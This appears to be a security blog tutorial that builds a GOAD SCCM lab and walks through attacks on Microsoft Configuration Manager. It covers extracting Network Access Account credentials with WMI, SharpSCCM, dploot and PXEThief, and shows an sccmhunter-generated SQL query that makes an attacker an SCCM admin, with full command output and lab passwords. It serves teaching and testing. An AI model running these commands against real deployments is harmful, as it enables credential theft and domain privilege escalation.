Microsoft Configuration Manager

Microsoft Configuration Manager is system management software developed by Microsoft. It was previously known as System Center Configuration Manager (SCCM). The software performs a number of tasks including software and operating system deployment, patch management, endpoint protection and inventory management.

This article looks at setting up a Configuration Manager lab, and at common vulnerabilities associated with Configuration Manager.

For the lab setup, we will be using Orange Cyberdefense's Game of Active Directory (GOAD) lab.


GOAD SCCM Configuration

The following setup instructions are for an Ubuntu 24.04 host. First, install the required packages.

sudo apt install virtualbox ansible python3-pip python3-venv ruby -y
sudo gem install winrm winrm-fs winrm-elevated

Then add the HashiCorp apt repository for Vagrant, and install it.

wget -O- https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant

Clone the GOAD repository from https://github.com/Orange-Cyberdefense/GOAD and check that the install prerequisites have been met.

./goad.sh -t check -l SCCM -p virtualbox -m local
[✓] Task: check
[✓] Lab: SCCM
[✓] Provider: virtualbox
[✓] Method: local
[✓] folder ad/SCCM/providers/virtualbox found
[✓] Launch check : ./scripts/check.sh virtualbox local
[+] Enumerating virtulabox
  [✓] virtualbox is installed
  [✓] Vagrant was found in your PATH
  [✓] Your version of Vagrant (2.4.1) is supported
  [✓] The vagrant-reload plugin is currently installed
  [✓] You have more than 120GB of free space on your primary partition
  [✓] You have more than 24GB of ram
  [✓] python3 is installed
  [✓] python3 (3.12.3) is supported
  [✓] Checking if python3 env is ansible ready :
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
    [✓] ansible-core 2.16.3  is supported
WARNING: Skipping /usr/lib/python3.12/dist-packages/argcomplete-3.1.4.dist-info due to invalid metadata entry 'name'
    [✓] pywinrm is installed
  [✓] ansible is installed
  [✓] ansible-galaxy is installed
    [✓] ansible-galaxy collection community.windows installed
    [✓] ansible-galaxy collection community.general installed
    [✓] ansible-galaxy collection ansible.windows installed
  [✓] ansible-galaxy requirements ok
[✓] Check is ok, you can start the installation

Assuming that completes, the lab can be installed with:

./goad.sh -t install -l SCCM -p virtualbox -m local

My install failed halfway through with an error similar to the one below.

fatal: [srv01]: FAILED! => {"attempts": 3, "changed": false, "elapsed": 2.2032366, "log": "=== Verbose logging started: 8/14/2024  6:26:29  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\\Windows\\System32\\msiexec.exe ===\r\nMSI (c) (20:B4) [06:26:29:013]: Resetting cached policy values\r\nMSI (c) (20:B4) [06:26:29:013]: Machine policy value 'Debug' is 0\r\nMSI (c) (20:B4) [06:26:29:013]: ******* RunEngine:\r\n           ******* Product: C:\\Users\\vagrant\\AppData\\Local\\Temp\\ansible-moduletmp-133681155826084845-1316-1878243768\\msodbcsql.msi\r\n           ******* Action: \r\n           ******* CommandLine: **********\r\nMSI (c) (20:B4) [06:26:29:013]: Client-side and UI is none or basic: Running entire install on the server.\r\nMSI (c) (20:B4) [06:26:29:013]: Grabbed execution mutex.\r\nMSI (c) (20:B4) [06:26:29:013]: Cloaking enabled.\r\nMSI (c) (20:B4) [06:26:29:013]: Attempting to enable all disabled privileges before calling Install on Server\r\nMSI (c) (20:B4) [06:26:29:029]: Incrementing counter to disable shutdown.

To fix this, log in to SCCM-MECM with the credentials dave/dragon and install the following package:

http://aka.ms/vs/15/release/vc_redist.x64.exe

Rerun the install process, and it should then succeed:

PLAY RECAP ***************************************************************************************************************************************************
dc01                       : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv01                      : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
ws01                       : ok=2    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[✓] Command successfully executed
[✓] your lab : SCCM is successfully setup ! have fun ;)
Build in 108 minutes and 41 seconds.
/home/user/Documents/GOAD-main

Retrieving Network Access Account Credentials

Network access account (NAA) credentials are typically used when a system that is not domain joined needs to be managed by SCCM. The account should not require any special privileges; however, the account used is chosen by an administrator, and may therefore have more privileges than required.

WMI can be used to determine whether Network Access Account credentials are stored on a client.

*Evil-WinRM* PS C:\Program Files (x86)> Get-WmiObject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"


__GENUS               : 2
__CLASS               : CCM_NetworkAccessAccount
__SUPERCLASS          : CCM_ComponentClientConfig
__DYNASTY             : CCM_Policy
__RELPATH             : CCM_NetworkAccessAccount.SiteSettingsKey=1
__PROPERTY_COUNT      : 8
__DERIVATION          : {CCM_ComponentClientConfig, CCM_Policy}
__SERVER              : CLIENT
__NAMESPACE           : ROOT\ccm\policy\Machine\ActualConfig
__PATH                : \\CLIENT\ROOT\ccm\policy\Machine\ActualConfig:CCM_NetworkAccessAccount.SiteSettingsKey=1
ComponentName         :
Enabled               :
NetworkAccessPassword : <PolicySecret Version="1"><![CDATA[F600000001000000D08C9DDF0115D1118C7A00C04FC297EB010000009FAF1566A8874F488C4C1DFCB04BE28000000000020000000000106600000001000020000000B766534583FB5C28AC4513A026F6E0480F57C89DE55C46A0A4152C6558
                        AD41D5000000000E8000000002000020000000CFD4277E10791D1246608136B1FD529DFB75E47A276AFCD95D7144EAB06F26F42000000048DC9D0F64FC3A1FB0BAE73102217C9E483DCD652ED48E139CFE9DB044C7D08A400000002EC45791904CD689F7C9D7BCD3CF6D119F4AC6803E9
                        723367EB4F3BF9646442F2A56879E2A0E32FD8749BF9F88E7CBBCD4359C5EEA0912C4FAA527BFF1BDDEB1]]></PolicySecret>
NetworkAccessUsername : <PolicySecret Version="1"><![CDATA[0601000001000000D08C9DDF0115D1118C7A00C04FC297EB010000009FAF1566A8874F488C4C1DFCB04BE2800000000002000000000010660000000100002000000037BC194AAE764B482365EB2BB38779CFD156DC6511AC1CA5763187C1FF
                        BA335B000000000E8000000002000020000000767B8CD53094D160ACA19DF489AB72F5963175F55560B535C4DF5804F5017007300000008255AF4F15A5C8CA2C5F053355666D88AE189FB90FD55F2AA959FE2CC92DC8B68880622003CAB7335C83A74B1E03E3604000000052384B9E8BF
                        60DBCD46750D393C2448B741D2D11F4059C1808A30352E8B526310047E84C5249566CC013E50D5D859109474CF4BDC119727E255640927E59D0C3]]></PolicySecret>
Reserved1             :
Reserved2             :
Reserved3             :
SiteSettingsKey       : 1
PSComputerName        : CLIENT

SharpSCCM Decryption

The username and password blobs are encrypted with DPAPI. The easiest way to decrypt them is with a tool such as SharpSCCM, which automates the process. This requires local administrator credentials.
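To see why decryption needs that level of access, the following added Python example (not code from the page, SharpSCCM or dploot) parses only the header of a NetworkAccessPassword PolicySecret: the 4-byte length prefix SCCM puts in front, then the DPAPI blob header with its provider GUID, the GUID of the master key that protects the secret, and the cipher and hash algorithms. Nothing is decrypted. The sample input is the first wrapped line of the NetworkAccessPassword blob from the WMI output above, put back inside its XML envelope, so it is deliberately cut short and the parser has to report the truncation rather than misread later fields; the master key GUID set is the SYSTEM master key list that SharpSCCM and dploot print below; the provider GUID and CALG constants are documented Windows values.

```python
import re
import struct
import uuid
from typing import Optional

# Documented Windows values: the provider GUID present in every DPAPI blob and
# the CryptoAPI algorithm ids most often seen in these headers.
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}

# Constructed sample: the first wrapped line of the NetworkAccessPassword blob
# from the WMI output above, put back inside its PolicySecret envelope. It is
# deliberately only the start of the blob, so the parser must handle a cut-off body.
SAMPLE_POLICY_SECRET = (
    '<PolicySecret Version="1"><![CDATA['
    "F600000001000000D08C9DDF0115D1118C7A00C04FC297EB010000009FAF1566A8874F488C4C1DFCB04BE280"
    "00000000020000000000106600000001000020000000B766534583FB5C28AC4513A026F6E0480F57C89DE55C"
    "46A0A4152C6558]]></PolicySecret>"
)

# SYSTEM master key GUIDs as listed by SharpSCCM and dploot further down the page.
SYSTEM_MASTERKEY_GUIDS = {
    "2d646e92-80e4-423e-b2b9-994923083bf0", "7d07c85d-37f6-4300-8be0-5c5c60bc21d6",
    "bdfd60e1-036f-42ef-917f-d569f329eb07", "cf97801c-cb50-4710-8134-04b414c70e9d",
    "2898a327-0ec1-4fcc-af1d-3451c5febd7b", "6615af9f-87a8-484f-8c4c-1dfcb04be280",
    "8ede9fcc-0748-4191-973f-71fbd748fa20",
}

# Field order of a DPAPI blob after the 4-byte length prefix SCCM adds.
DPAPI_LAYOUT = (
    ("version", "u32"), ("provider_guid", "guid"),
    ("masterkey_version", "u32"), ("masterkey_guid", "guid"),
    ("flags", "u32"), ("description", "wstr"),
    ("crypt_alg", "calg"), ("crypt_key_bits", "u32"), ("salt", "blob"),
    ("strong", "blob"),
    ("hash_alg", "calg"), ("hash_bits", "u32"), ("hmac_key", "blob"),
    ("data", "blob"), ("signature", "blob"),
)


class _Cursor:
    """Little-endian reader that yields None (instead of raising) past the end of data."""

    def __init__(self, buf: bytes):
        self.buf, self.pos = buf, 0

    def u32(self) -> Optional[int]:
        if self.pos + 4 > len(self.buf):
            return None
        (v,) = struct.unpack_from("<I", self.buf, self.pos)
        self.pos += 4
        return v

    def take(self, n: Optional[int]) -> Optional[bytes]:
        if n is None or self.pos + n > len(self.buf):
            return None
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def guid(self) -> Optional[str]:
        raw = self.take(16)
        return None if raw is None else str(uuid.UUID(bytes_le=raw))

    def calg(self) -> Optional[str]:
        v = self.u32()
        return None if v is None else CALG_NAMES.get(v, "0x%04x" % v)

    def wstr(self) -> Optional[str]:
        raw = self.take(self.u32())
        return None if raw is None else raw.decode("utf-16-le").rstrip("\x00")

    def blob(self) -> Optional[bytes]:
        return self.take(self.u32())


def policy_secret_payload(policy_secret_xml: str) -> bytes:
    """Return the raw bytes carried in a <PolicySecret> CDATA section."""
    m = re.search(r"<!\[CDATA\[([0-9A-Fa-f]+)\]\]>", policy_secret_xml)
    if m is None:
        raise ValueError("no hex CDATA payload in PolicySecret")
    return bytes.fromhex(m.group(1))


def parse_naa_secret(payload: bytes) -> dict:
    """Decode the length prefix and the DPAPI header; the ciphertext is never decrypted."""
    (declared_len,) = struct.unpack_from("<I", payload, 0)
    cur = _Cursor(payload[4:])
    info = {"declared_len": declared_len, "truncated": len(cur.buf) < declared_len}
    for name, kind in DPAPI_LAYOUT:
        info[name] = getattr(cur, kind)()
        if info[name] is None:  # ran off the end: stop rather than misread later fields
            info["truncated"] = True
            break
    for name, _ in DPAPI_LAYOUT:
        info.setdefault(name, None)
    info["is_dpapi"] = info["provider_guid"] == DPAPI_PROVIDER_GUID
    return info


def describe_naa_secret(policy_secret_xml: str, system_masterkeys=SYSTEM_MASTERKEY_GUIDS) -> dict:
    """Parse a PolicySecret and report whether a SYSTEM master key protects it."""
    info = parse_naa_secret(policy_secret_payload(policy_secret_xml))
    info["protected_by_system_key"] = info["masterkey_guid"] in system_masterkeys
    return info


if __name__ == "__main__":
    for k, v in describe_naa_secret(SAMPLE_POLICY_SECRET).items():
        print("%-24s %s" % (k, v.hex() if isinstance(v, bytes) else v))
```

The master key named in the header, 6615af9f-87a8-484f-8c4c-1dfcb04be280, is one of the SYSTEM master keys both tools enumerate (dploot shows its file under C:\Windows\System32\Microsoft\Protect\S-1-5-18\User). Only SYSTEM, or a local administrator able to become SYSTEM, can use that key, which is why the decryption steps need local administrator credentials, and why reads of that directory by anything other than the ConfigMgr client are worth alerting on.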

First, let’s upload SharpSCCM to the CLIENT system.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 192.168.60.13 -u bob -p marley
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\bob\Documents> hostname
CLIENT
*Evil-WinRM* PS C:\Users\bob\Documents> upload /home/kali/SharpSCCM.exe
Info: Uploading /home/kali/SharpSCCM.exe to C:\Users\bob\Documents\SharpSCCM.exe
Data: 1501184 bytes of 1501184 bytes copied
Info: Upload successful!

The following SharpSCCM command will then extract the plaintext credentials.

*Evil-WinRM* PS C:\Users\bob\Documents> .\SharpSCCM.exe local secrets -m disk

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Retrieving secret blobs from CIM repository

[+] Modifying permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Modifying permissions on registry key: SECURITY\Policy\PolEKList
[+] Reverting permissions on registry key: SECURITY\Policy\Secrets\DPAPI_SYSTEM\CurrVal\
[+] Reverting permissions on registry key: SECURITY\Policy\PolEKList

[+] Secret: DPAPI_SYSTEM
    full: FEAC041AF7BB53F075D3B1297F92D7AB4AD4DC3C7FAEFFFEB60D6A58CE3D2052ACD46201CA939403
     m/u: FEAC041AF7BB53F075D3B1297F92D7AB4AD4DC3C / 7FAEFFFEB60D6A58CE3D2052ACD46201CA939403

[+] SYSTEM master key cache:
    {2d646e92-80e4-423e-b2b9-994923083bf0}:928D8B7E438DC6CCD5CF105E73C7E5FABAD40792
    {7d07c85d-37f6-4300-8be0-5c5c60bc21d6}:E0886A2D0C4F8384FAD2AC59F574EB32A2C77E0A
    {bdfd60e1-036f-42ef-917f-d569f329eb07}:FE73A457220F49A819DE16D06DCE72CA580AB514
    {cf97801c-cb50-4710-8134-04b414c70e9d}:CD0271B161D6FED537E0B9639A37B62A0353FFFC
    {2898a327-0ec1-4fcc-af1d-3451c5febd7b}:405B7821B15C9DB4CDB0E7EBF88B1AD6E38C3C05
    {6615af9f-87a8-484f-8c4c-1dfcb04be280}:7DB6DFAA78147C16FEE4429E0E15DBC900DF0343
    {8ede9fcc-0748-4191-973f-71fbd748fa20}:A654CEC664CC2AB952D49F9986CC235D48B7F9F7

[+] Decrypting 2 network access account secrets

    NetworkAccessUsername: sccm.lab\sccm-naa
    NetworkAccessPassword: 123456789

    NetworkAccessUsername: sccm.lab\sccm-naa
    NetworkAccessPassword: 123456789

[+] Decrypting 1 other secrets

    Plaintext secret: <PolicyAction PolicyActionType="WMI-XML">
        <instance class="CCM_NetworkAccessAccount">
                <property name="SiteSettingsKey" type="19">
                        <value>
                                <![CDATA[1]]>
                        </value>
                </property>
                <property name="NetworkAccessUsername" type="8" secret="1">
                        <value>
                                <![CDATA[89130000DC04B850A63B412D691584A9E3F46D2F0C4342C7EF9387DDD5ADCF95AF1E09423ED7DB020E0473D71400000024000000280000000366000000000000524BE4593A1C9EF8F1156B58376920A6E694F13E0D5D6E4B87982A4B6769C3ABB091802F3A8D19EC00000000]]>
                        </value>
                </property>
                <property name="NetworkAccessPassword" type="8" secret="1">
                        <value>
                                <![CDATA[89130000D99D49B50150755B3833B6F3E0A02CEDF665033FA8753993D2E32FD9823807C62F55AA0C89A46D51140000001400000018000000036600000000000071BBA43AA27B3C0A3EF201069358191D0ABA2D1B935A309C2050726F]]>
                        </value>
                </property>
                <property name="Reserved1" type="8">
                        <value>
                        </value>
                </property>
                <property name="Reserved2" type="8">
                        <value>
                        </value>
                </property>
                <property name="Reserved3" type="8">
                        <value>
                        </value>
                </property>
        </instance>
</PolicyAction>

[+] Completed execution in 00:00:01.8102600

dploot Decryption

SCCM credentials can also be extracted from a network-adjacent host using dploot. On Kali, the tool can be installed from the python3-dploot package.

dploot sccm -u bob -p marley 192.168.60.13 -debug
[+] Connecting to 192.168.60.13
[+] Authenticating with bob through NTLM
[*] Connected to 192.168.60.13 as \bob (admin)

[*] Triage SYSTEM masterkeys

[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\2d646e92-80e4-423e-b2b9-994923083bf0
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\7d07c85d-37f6-4300-8be0-5c5c60bc21d6
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\bdfd60e1-036f-42ef-917f-d569f329eb07
[+] Found SYSTEM system MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\cf97801c-cb50-4710-8134-04b414c70e9d
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\2898a327-0ec1-4fcc-af1d-3451c5febd7b
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\6615af9f-87a8-484f-8c4c-1dfcb04be280
[+] Found SYSTEM user MasterKey: \\192.168.60.13\C$\Windows\System32\Microsoft\Protect\S-1-5-18\User\8ede9fcc-0748-4191-973f-71fbd748fa20
{2d646e92-80e4-423e-b2b9-994923083bf0}:928d8b7e438dc6ccd5cf105e73c7e5fabad40792
{7d07c85d-37f6-4300-8be0-5c5c60bc21d6}:e0886a2d0c4f8384fad2ac59f574eb32a2c77e0a
{bdfd60e1-036f-42ef-917f-d569f329eb07}:fe73a457220f49a819de16d06dce72ca580ab514
{cf97801c-cb50-4710-8134-04b414c70e9d}:cd0271b161d6fed537e0b9639a37b62a0353fffc
{2898a327-0ec1-4fcc-af1d-3451c5febd7b}:405b7821b15c9db4cdb0e7ebf88b1ad6e38c3c05
{6615af9f-87a8-484f-8c4c-1dfcb04be280}:7db6dfaa78147c16fee4429e0e15dbc900df0343
{8ede9fcc-0748-4191-973f-71fbd748fa20}:a654cec664cc2ab952d49f9986cc235d48b7f9f7

[*] Triage SCCM Secrets

[+] Looking for NAA Credentials from OBJECTS.DATA file
[+] Found NAA Credentials from OBJECTS.DATA file
[+] Found NAA Credentials from OBJECTS.DATA file
[+] Looking for task sequences secret from OBJECTS.DATA file
[+] Looking for collection variables from OBJECTS.DATA file
[NAA Account]
        Username:       sccm.lab\sccm-naa
        Password:       123456789
[NAA Account]
        Username:       sccm.lab\sccm-naa
        Password:       123456789


Retrieving Credentials using PXE

PXE (Preboot eXecution Environment) boot is a protocol used to boot a computer over a network before the operating system has loaded. This is commonly used in enterprise environments to deploy new operating systems.

PXEThief can be used to download the PXE boot media and extract any stored credentials. For automatic credential decryption to work, it needs to be run from a Windows host.

python pxethief.py 2 192.168.60.11
 ________  ___    ___ _______  _________  ___  ___  ___  _______   ________
|\   __  \|\  \  /  /|\  ___ \|\___   ___\\  \|\  \|\  \|\  ___ \ |\  _____\
\ \  \|\  \ \  \/  / | \   __/\|___ \  \_\ \  \\\  \ \  \ \   __/|\ \  \__/
 \ \   ____\ \    / / \ \  \_|/__  \ \  \ \ \   __  \ \  \ \  \_|/_\ \   __\
  \ \  \___|/     \/   \ \  \_|\ \  \ \  \ \ \  \ \  \ \  \ \  \_|\ \ \  \_|
   \ \__\  /  /\   \    \ \_______\  \ \__\ \ \__\ \__\ \__\ \_______\ \__\
    \|__| /__/ /\ __\    \|_______|   \|__|  \|__|\|__|\|__|\|_______|\|__|
          |__|/ \|__|

[+] Generating and downloading encrypted media variables file from MECM server located at 192.168.60.11
[+] Using interface: \Device\NPF_{B4C18489-2E87-4544-96C4-933DF581E3C2} - Intel(R) PRO/1000 MT Desktop Adapter #2
[+] Targeting user-specified host: 192.168.60.11

[+] Asking ConfigMgr for location to download the media variables and BCD files...

Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets

[!] Variables File Location: \SMSTemp\2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var
[!] BCD File Location: \SMSTemp\2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd
[!] Blank password on PXE boot found!
[+] Use this command to grab the files:
tftp -i 192.168.60.11 GET "\SMSTemp\2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var" "2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var"
tftp -i 192.168.60.11 GET "\SMSTemp\2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd" "2024.08.15.02.31.30.04.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.bcd"
[!] Attempting automatic exploitation. Note that this will require the default tftp client to be installed (on Windows, this can be found under Windows Features), and this will be run with os.system
tftp: can't write to local file '2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var'
[+] Media variables file to decrypt: 2024.08.15.02.31.30.0001.{EC9BC447-716D-4DA5-B7C9-C57B0D25E996}.boot.var
[+] Password bytes provided: 0xf8ff77006f00c5ffa9ff5800c2ffa5ff54000b00
[+] Successfully decrypted media variables file with the provided password!
[!] Writing media variables to variables.xml
[!] Writing _SMSTSMediaPFX to P01_{F62083AC-5938-4C59-8A8E-26D61A_SMSTSMediaPFX.pfx. Certificate password is {F62083AC-5938-4C59-8A8E-26D61A
[+] Identifying Management Point URL from media variables (Subsequent requests may fail if DNS does not resolve!)
[+] Management Point URL set to: http://MECM.sccm.lab
[+] Successfully Imported PFX File into Windows Certificate Store!
[+] Generating Client Authentication headers using PFX File...
[+] CCMClientID Signature Generated
[+] CCMClientTimestamp Signature Generated
[+] ClientToken Signature Generated
[+] Retrieving x64UnknownMachineGUID from MECM MP...
[+] Requesting policy assignments from MP...
[+] 47 policy assignment URLs found!
[+] Requesting Network Access Account Configuration from: http://MECM.sccm.lab/SMS_MP/.sms_pol?{3593b738-9a66-4fef-9bef-aae3e2f77a61}.2_00
[+] Requesting Task Sequence Configuration from: http://MECM.sccm.lab/SMS_MP/.sms_pol?P0120001-P0100008-6F6BCC28.1_00

[+] Decrypting Network Access Account Configuration
[+] Extracting password from Decrypted Network Access Account Configuration

[!] Network Access Account Username: 'sccm.lab\sccm-naa'
[!] Network Access Account Password: '123456789'
[!] Network Access Account Username: 'sccm.lab\sccm-naa'
[!] Network Access Account Password: '123456789'

[+] Decrypting Task Sequence Configuration

[!] Successfully Decrypted TS_Sequence XML Blob in Task Sequence 'Install_win10_OS_image'!
[+] Attempting to automatically identify credentials in Task Sequence 'Install_win10_OS_image':

[!] Possible credential fields found!

In TS Step "Apply Windows Settings":
OSDRegisteredUserName - Administrator
OSDLocalAdminPassword - EP+xh7Rk6j90

In TS Step "Apply Network Settings":
OSDJoinAccount - sccm.lab\sccm-naa
OSDJoinPassword - 123456789

[+] Cleaning up
Traceback (most recent call last):

Relay Attacks

The GOAD SCCM environment hosts the SCCM MSSQL database on a separate server. We can relay a connection from the system where MECM is installed to the MSSQL database to add a new administrative user. First, use sccmhunter to gather the site details we will need.

python3 sccmhunter.py find -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.60.10       
SCCMHunter v1.0.5 by @garrfoster
[15:12:04] INFO     [*] Checking for System Management Container.                                                                                                                                                                              
[15:12:04] INFO     [+] Found System Management Container. Parsing DACL.                                                                                                                                                                       
[15:12:04] INFO     [+] Found 1 computers with Full Control ACE                                                                                                                                                                                
[15:12:04] INFO     [*] Querying LDAP for published Sites and Management Points                                                                                                                                                                
[15:12:04] INFO     [+] Found 1 Management Points in LDAP.                                                                                                                                                                                     
[15:12:04] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                                                                                                                                                    
[15:12:04] INFO     [+] Found 11 principals that contain the string 'SCCM' or 'MECM'.        

python3 sccmhunter.py show -all                                                 
SCCMHunter v1.0.5 by @garrfoster
[15:11:46] INFO     [+] Showing SiteServers Table                                                                                                                                                                                              
[15:11:46] INFO     +---------------+------------+-------+-----------------+--------------+---------------+----------+---------+                                                                                                               
                    | Hostname      | SiteCode   | CAS   | SigningStatus   | SiteServer   | SMSProvider   | Config   | MSSQL   |                                                                                                               
                    +===============+============+=======+=================+==============+===============+==========+=========+                                                                                                               
                    | mecm.sccm.lab |            |       |                 | True         |               |          |         |                                                                                                               
                    +---------------+------------+-------+-----------------+--------------+---------------+----------+---------+                                                                                                               
[15:11:46] INFO     [+] Showing ManagementPoints Table                                                                                                                                                                                         
[15:11:46] INFO     +---------------+------------+-----------------+                                                                                                                                                                           
                    | Hostname      | SiteCode   | SigningStatus   |                                                                                                                                                                           
                    +===============+============+=================+                                                                                                                                                                           
                    | mecm.sccm.lab | P01        |                 |                                                                                                                                                                           
                    +---------------+------------+-----------------+                                                                                                                                                                           
[15:11:46] INFO     [+] Showing USERS Table                                                                                                                                                                                                    
[15:11:46] INFO     +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | cn               | name             | sAMAAccontName   | servicePrincipalName         | description         |                                                                                                            
                    +==================+==================+==================+==============================+=====================+                                                                                                            
                    | sccm-sql         | sccm-sql         | sccm-sql         | MSSQLSvc/MSSQL.sccm.lab      | sql service         |                                                                                                            
                    |                  |                  |                  | MSSQLSvc/MSSQL.sccm.lab:1433 |                     |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-naa         | sccm-naa         | sccm-naa         |                              | naa account         |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-account-da  | sccm-account-da  | sccm-account-da  |                              | sccm account        |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
                    | sccm-client-push | sccm-client-push | sccm-client-push |                              | client push account |                                                                                                            
                    +------------------+------------------+------------------+------------------------------+---------------------+                                                                                                            
[15:11:46] INFO     [+] Showing GROUPS Table                                                                                                                                                                                                   
[15:11:46] INFO     +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | cn                  | name                | sAMAAccontName      | member                                     | description   |                                                                                           
                    +=====================+=====================+=====================+============================================+===============+                                                                                           
                    | SCCM-Managed-Device | SCCM-Managed-Device | SCCM-Managed-Device | CN=CLIENT,CN=Computers,DC=sccm,DC=lab      |               |                                                                                           
                    |                     |                     |                     | CN=MECM,CN=Computers,DC=sccm,DC=lab        |               |                                                                                           
                    |                     |                     |                     | CN=MSSQL,CN=Computers,DC=sccm,DC=lab       |               |                                                                                           
                    |                     |                     |                     | CN=DC,OU=Domain Controllers,DC=sccm,DC=lab |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | SCCM-Admins         | SCCM-Admins         | SCCM-Admins         | CN=dave,CN=Users,DC=sccm,DC=lab            |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
                    | SCCM-Site-Server    | SCCM-Site-Server    | SCCM-Site-Server    | CN=MECM,CN=Computers,DC=sccm,DC=lab        |               |                                                                                           
                    +---------------------+---------------------+---------------------+--------------------------------------------+---------------+                                                                                           
[15:11:46] INFO     [+] Showing COMPUTERS Table                                                                                                                                                                                                
[15:11:46] INFO     +---------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+                                                                               
                    | Hostname      | SiteCode   | SigningStatus   | SiteServer   | ManagementPoint   | DistributionPoint   | SMSProvider   | WSUS   | MSSQL   |                                                                               
                    +===============+============+=================+==============+===================+=====================+===============+========+=========+                                                                               
                    | mecm.sccm.lab |            |                 |              |                   |                     |               |        |         |                                                                               
                    +---------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+   

The main thing we need from this output is the site code, which we can see is P01.

Next, use sccmhunter.py to generate the MSSQL query that we will relay. Note that the site code is P01 with a zero, not the letter O.

python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.60.10 -tu carol -sc P01 -stacked
/home/kali/.local/lib/python3.11/site-packages/pandas/core/arrays/masked.py:60: UserWarning: Pandas requires version '1.3.6' or newer of 'bottleneck' (version '1.3.5' currently installed).
  from pandas.core import (
SCCMHunter v1.0.5 by @garrfoster
[03:46:01 PM] INFO     [*] Resolving carol SID...
[03:46:01 PM] INFO     [*] Converted carol SID to 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000
[03:46:01 PM] INFO     [*] Use the following to add carol as a Site Server Admin.

DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );

